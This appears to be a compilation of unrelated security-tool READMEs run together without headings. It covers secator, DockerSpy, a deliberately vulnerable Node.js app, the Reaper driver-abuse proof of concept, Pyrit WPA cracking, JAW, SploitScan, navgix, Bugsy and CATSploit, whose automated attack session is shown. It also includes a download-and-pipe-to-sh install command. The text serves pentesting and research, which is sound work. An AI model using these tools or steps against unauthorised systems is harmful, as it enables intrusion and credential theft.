secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and is designed to improve productivity for pentesters and security researchers.
- Curated list of commands
- Unified input options
- Unified output schema
- CLI and library usage
- Distributed options with Celery
- Complexity from simple tasks to complex workflows
secator integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress security scanner. | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator uses external tools, so you might need to install the languages used by those tools, assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool, which should work on all systems supporting apt:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available version of each tool before you run secator, or you might run into parsing/formatting issues.
secator comes installed with a minimal set of dependencies. There are several addons available for secator:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
And more... To list all the tasks, workflows, and scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator, check out:
- Our complete documentation
- Our getting started tutorial video
- Our Medium post
- Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.
Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.
Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.
Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:
Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.
Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.
Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.
Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.
Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.
Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.
DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
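As an illustration of that approach (a hypothetical sketch, not DockerSpy's actual rule set — the pattern, directory name, and workflow here are assumptions), matching AWS access key IDs inside files extracted from image layers might look like:
grep -rEho 'AKIA[0-9A-Z]{16}' ./extracted-layers/ | sort -u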
To use DockerSpy, follow these steps:
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
dockerspy
To customize DockerSpy configurations, edit the following files:
- Regular Expressions
- Ignored File Extensions
DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
DockerSpy is developed and maintained by Alisson Moretto (UndeadSec).
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
Consider following me:
Special thanks to @akaclandestine
A vulnerable application made using Node.js, Express server, and EJS template engine. This application is meant for educational purposes only.
git clone https://github.com/4auvar/VulnNodeApp.git
npm install
CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
create database vuln_node_app_db;
GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
USE vuln_node_app_db;
create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
insert into users(fullname,username,password,email,phone) values("test5","test5","test5","test5@test.com","7893451230");
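To confirm the seed data loaded correctly, you can query the table using the credentials created above (a quick check, assuming a standard MySQL client is installed):
mysql -u vulnnodeapp -p vuln_node_app_db -e "SELECT id, username, email FROM users;"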
npm start
You can reach me out at @4auvar
Reaper is a proof-of-concept designed to exploit a BYOVD (Bring Your Own Vulnerable Driver) vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.
Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.
Note: Reaper does not kill the Windows Defender process, as that process is protected; Reaper is a simple proof of concept.
____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/
[Coded by MrEmpy]
[v1.0]
Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process
Values:
PROCESSID process id to suspend/kill
Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337
You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.
Note: The executable and driver must be in the same directory.
Pyrit allows you to create massive databases that pre-compute the WPA/WPA2-PSK authentication phase in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA, and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g., on their laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; these ultimately allow the password that protects the network to be revealed. This vulnerability has to be considered exceptionally disastrous, as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).
The author does not encourage or support using Pyrit for the infringement of people's communication privacy. The exploration and realization of the technology discussed here are a purpose of their own; this is documented by the open development, strictly source-code-based distribution, and 'copyleft' licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X, and Linux as operating systems, and on x86, alpha, arm, hppa, mips, powerpc, s390, and sparc processors.
Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
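A back-of-the-envelope check of that equivalence (assuming the standard WPA key derivation parameters: two PBKDF2 output blocks, 4096 iterations each, one HMAC-SHA1 per iteration, two SHA1 compressions per HMAC): 2 x 4096 x 2 = 16,384 SHA1 compressions of 64 bytes each per PMK, i.e. roughly 1 MiB of hashed data, so 10,000 PMKs per second works out to about 9.8 GiB of SHA1 throughput per second.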
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue (https://github.com/JPaulMora/Pyrit/issues).
An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.
This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.
JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.
Release Notes: for earlier versions of JAW, see the JAW-V2 and JAW-V1 branches.
The architecture of JAW is shown below.
JAW can be used in two distinct ways:
Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.
Web Application Analysis: Analyze a web application by providing a single seed URL.
Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.
Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).
Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.
JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering, and request hijacking vulnerabilities.
The outputs will be stored in the same folder as the input.
The installation script relies on the following prerequisites:
- Latest version of the npm package manager (Node.js)
- Any stable version of Python 3.x
- The Python pip package manager
Afterwards, install the necessary dependencies via:
$ ./install.sh
For detailed installation instructions, please see here.
You can run an instance of the pipeline in a background screen via:
$ python3 -m run_pipeline --conf=config.yaml
The CLI provides the following options:
$ python3 -m run_pipeline -h
usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]
This script runs the tool pipeline.
optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)
Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.
Hint. The config file specifies different passes (e.g., crawling, static analysis, etc.) which can be enabled or disabled for each vulnerability class. This allows running the tool's building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).
For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:
$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js
This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScript file that you already have on your file system, you can skip this step.
JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.
This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:
$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>
The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox, which contains a binary named firefox.
Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.
To start the crawler, do:
$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true
See here for more information.
To start the crawler, do:
$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d
Please refer to the documentation of the hpg_crawler here for more information.
To generate an HPG for a given (set of) JavaScript file(s), do:
$ node engine/cli.js --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv
optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)
To import an HPG inside a neo4j graph database (docker instance), do:
$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h
usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]
This script imports a CSV of a property graph into a neo4j docker database.
optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)
In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:
$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>
Specification of Parameters:
- <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
- --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
- --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
- --hybrid=<bool>: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputting files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
- --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of observed network requests; pass the string false to exclude (default: request_logs_short.out).
- --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events; pass the string false to exclude (default: events.out).
- --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies; pass the string false to exclude (default: cookies.pkl).
- --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot; pass the string false to exclude (default: html_rendered.html).
For more information, you can use the help CLI provided with the graph construction API:
$ python3 -m engine.api -h
The constructed HPG can then be queried using Cypher or the NeoModel ORM.
You should place and run your queries in analyses/<ANALYSIS_NAME>.
You can use the NeoModel ORM to query the HPG. To write a query, see the example file example_query_orm.py in the analyses/example folder, then run:
$ python3 -m analyses.example.example_query_orm
For more information, please see here.
You can use Cypher to write custom queries. For this, see the example file example_query_cypher.py in the analyses/example folder, then run:
$ python3 -m analyses.example.example_query_cypher
For more information, please see here.
This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF, DOM Clobbering, and request hijacking.
Step 1. Enable the analysis component for the vulnerability class in the input config.yaml file:
request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]
cs_csrf:
enabled: false
# [...]
Step 2. Run an instance of the pipeline with:
$ python3 -m run_pipeline --conf=config.yaml
Hint. You can run multiple instances of the pipeline under different screens:
$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]
To generate parallel configuration files automatically, you may use the generate_config.py script.
The outputs will be stored in a file called sink.flows.out in the same folder as the input. For client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a. semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. However, a request marked with ['NON-REACH'] is not forgeable.
An example output entry is shown below:
[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })
1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href
This entry shows that, on line 29, there is a $.ajax call expression that triggers an ajax request with the URL template value ajaxloc + "/bearer1234/", where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, and is thus forgeable through ['WIN.LOC'].
In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.
First, install the dependencies via:
$ cd tests/test-webapp
$ npm install
Then, run the application in a new screen:
$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'
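Once the application is up, a quick smoke test (assuming it serves HTTP on the port configured above):
$ curl -s http://localhost:6789 | head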
For more information, visit our wiki page here. Below is a table of contents for quick access.
Pull requests are always welcome. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.
If you use the JAW for academic research, we encourage you to cite the following paper:
@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}
JAW has come a long way and we want to give our contributors a well-deserved shoutout here!
@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.
SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. It empowers cybersecurity professionals to swiftly identify and apply known exploits, and it is particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.
Regular:
python sploitscan.py CVE-YYYY-NNNNN
Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.
python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN
Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.
python sploitscan.py CVE-YYYY-NNNNN -e JSON
The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:
This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.
Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
Alexander Hagenah - URL - Twitter
navgix is a multi-threaded Go tool that checks for nginx alias traversal vulnerabilities.
Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):
navgix will make an initial GET request to the page, and if any directories are referenced in the page HTML (in src attributes of HTML components), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/, and /static/img/photos/.
navgix will also test a short list of directories that commonly have this vulnerability; if any of these directories exist, it will attempt to confirm whether the vulnerability is present.
git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build
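After building, a run looks something like the sketch below (the argument form is an assumption, since the original text does not show an invocation; consult the tool's help output for the real interface):
./navgix https://target.example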
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Analyze
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.
You can simply run Bugsy from the command line, using npx:
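The invocation itself is not shown in the original text; as a sketch (assuming Bugsy ships as the mobbdev npm package, as with Mobb's tooling — verify the package name and flags with npx mobbdev@latest --help before relying on this):
npx mobbdev@latest scan -r https://github.com/<org>/<repo>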
CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Currently, pentesters implicitly select the attack techniques suitable for the target systems. CATSploit uses system configuration information such as OS, open ports, and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without the hack-knack (a professional pentester's skill).
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input: First, CATSploit gathers information about the target systems. It supports nmap and OpenVAS for information gathering, and also supports prior information about the target systems if you have it.
Calculating score values of attack techniques: Using the information obtained in the previous phase and the attack techniques database, evaluation values of capture (eVc) and detectability (eVd) are calculated for each attack technique. The values of each attack technique are calculated for each target computer.
Selection of attack techniques by using scores and making the attack scenario: Attack techniques are selected and attack scenarios created according to pre-defined policies. For example, for a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) will be selected.
Execution of attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. It uses Metasploit as a framework and the Metasploit API to execute actual attacks.
CATSploit has the following prerequisites:
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with the -h option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan the network, plan an attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
hostID    IP            Hostname  Platform                 Pwned
--------  ------------  --------  -----------------------  -----
attacker  0.0.0.0       kali      kali 2022.4              True
h_exbiy6  192.168.0.10            Linux 3.10 - 4.11        False
h_nhqyfq  192.168.0.20            Microsoft Windows 7 SP1  False
catsploit> host detail h_exbiy6
hostID    IP            Hostname  Platform      Pwned
--------  ------------  --------  ------------  -----
h_exbiy6  192.168.0.10  ubuntu    ubuntu 14.04  False
[IP address]
ipv4          ipv4mask  ipv6  ipv6prefix
------------  --------  ----  ----------
192.168.0.10
[Open ports]
ip            proto  port  service      product       version
------------  -----  ----  -----------  ------------  --------------------------
192.168.0.10  tcp    21    ftp          ProFTPD       1.3.5
192.168.0.10  tcp    22    ssh          OpenSSH       6.6.1p1 Ubuntu 2ubuntu2.10
192.168.0.10  tcp    80    http         Apache httpd  2.4.7
192.168.0.10  tcp    445   netbios-ssn  Samba smbd    3.X - 4.X
192.168.0.10  tcp    631   ipp          CUPS          1.7
[Vulnerabilities]
ip            proto  port  vuln_name                                                             cve
------------  -----  ----  --------------------------------------------------------------------  --------------
192.168.0.10  tcp    0     TCP Timestamps Information Disclosure                                 N/A
192.168.0.10  tcp    21    FTP Unencrypted Cleartext Login                                       N/A
192.168.0.10  tcp    22    Weak MAC Algorithm(s) Supported (SSH)                                 N/A
192.168.0.10  tcp    22    Weak Encryption Algorithm(s) Supported (SSH)                          N/A
192.168.0.10  tcp    22    Weak Host Key Algorithm(s) (SSH)                                      N/A
192.168.0.10  tcp    22    Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                  N/A
192.168.0.10  tcp    80    Test HTTP dangerous methods                                           N/A
192.168.0.10  tcp    80    Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check      CVE-2014-3704
192.168.0.10  tcp    80    Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check   N/A
192.168.0.10  tcp    80    Sensitive File Disclosure (HTTP)                                      N/A
192.168.0.10  tcp    80    Unprotected Web App / Device Installers (HTTP)                        N/A
192.168.0.10  tcp    80    Cleartext Transmission of Sensitive Information via HTTP              N/A
192.168.0.10  tcp    80    jQuery < 1.9.0 XSS Vulnerability                                      CVE-2012-6708
192.168.0.10  tcp    80    jQuery < 1.6.3 XSS Vulnerability                                      CVE-2011-4969
192.168.0.10  tcp    80    Drupal 7.0 Information Disclosure Vulnerability - Active Check        CVE-2011-3730
192.168.0.10  tcp    631   SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                    CVE-2016-2183
192.168.0.10  tcp    631   SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                    CVE-2016-6329
192.168.0.10  tcp    631   SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                    CVE-2020-12872
192.168.0.10  tcp    631   SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection            CVE-2011-3389
192.168.0.10  tcp    631   SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection            CVE-2015-0204
[Users]
user name  group
---------  -----
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios were planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
scenario id  src host ip  target host ip  eVc    eVd    steps  first attack step
-----------  -----------  --------------  -----  -----  -----  ------------------------------
3d3ivc       0.0.0.0      192.168.0.10    1.0    32.0   1      exploit/multi/http/jenkins_s…
5gnsvh       0.0.0.0      192.168.0.10    1.0    53.76  2      exploit/multi/http/jenkins_s…
6nlxyc       0.0.0.0      192.168.0.10    0.0    48.32  2      exploit/multi/http/jenkins_s…
8jos4z       0.0.0.0      192.168.0.10    0.7    72.8   2      exploit/multi/http/jenkins_s…
8kmmts       0.0.0.0      192.168.0.10    0.0    32.0   1      exploit/multi/elasticsearch/…
agjmma       0.0.0.0      192.168.0.10    0.0    24.0   1      exploit/windows/http/managee…
joglhf       0.0.0.0      192.168.0.10    70.0   60.0   1      auxiliary/scanner/ssh/ssh_lo…
rmgrof       0.0.0.0      192.168.0.10    100.0  32.0   1      exploit/multi/http/drupal_dr…
